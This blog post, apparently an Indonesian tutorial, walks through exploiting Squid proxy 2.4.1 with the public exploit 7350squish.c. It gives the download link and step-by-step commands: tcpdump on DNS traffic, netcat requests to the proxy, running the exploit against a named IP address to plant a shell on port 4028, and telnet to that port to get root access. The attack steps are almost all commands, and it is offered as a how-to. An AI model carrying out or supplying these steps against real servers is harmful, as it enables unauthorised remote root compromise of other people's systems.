Pengetahuan dasar yang paling tidak di kuasai pada bahasan kali ini adalah command line interface (CLI) di lingkungan Unix/Linux satu server yang berisi squid server versi 2.4.1 sebagai target software tcpdump,dan 7350squish.c.
Berikut langkah-langkahnya..
1. anda download paket 7350squish.c di alamat website http://packetstormsecurity.nl/0205-exploits/7350squish.c
anda dapat menggunakan wget jika lingkungan linux/unix ,jika di lingkuingan windows anda dapat menggunakan Download Accelerator Plus(DAP)
2. Setelah anda men-download file 7250squish.c cari target yang menjalankan server squid 2.4.1 pada kasus server penulis menggunakan server lab yang berisi squid server,IP Address squid server 202.154.184.34,DNS server 202.154.184.1.
3. Dengan dat di atas ,jalankan perintah beriktu dari command line interface (shell/prompt)
#tcpdump -n src 202.154.184.34 and udp dst port 53 &
4. setelah anda mengetikan perintah di atas,lanjutkan dengan perintah request page dengan menggunakan perintah echo seperti berikut :
# (echo "HEAD http://example.com/HTTP/1.0";echo) | nc 202.154.184.34 8080 > /dev/null
5. Jalankan file 7350Squish.c yang sudah kita download perintah dibawah ini berfungsi untuk mengirim paket ke squid server
# ./7350squish -t 2 -p 4028 202.154.184.1:53
202.154.184.34 8080 2>&1 >dev/null
6. Kirim ulang paket request sekali lagi agar squid membaca paket yang kita kirim sebelumnya dengan menggunakan file 7350squish.
# (echo "HEAD http://example.com/HTTP/1.0";echo) | nc 202.154.184.34 8080 > /dev/null
7. Cek perintah di atas untuk membuktikan apakah eksploid bekerja dengan baik.Untuk membuktikan jalankan perintah telnet .Berikut contoh perintahnya :
# telnet 202.154.184.34 4028
8. Jika berhasil dan server squid yang sebagai target menjalankan SUID/user root,..sampai disini kita sudah berhasil melakukan eksploid ke server .
0 komentar:
Posting Komentar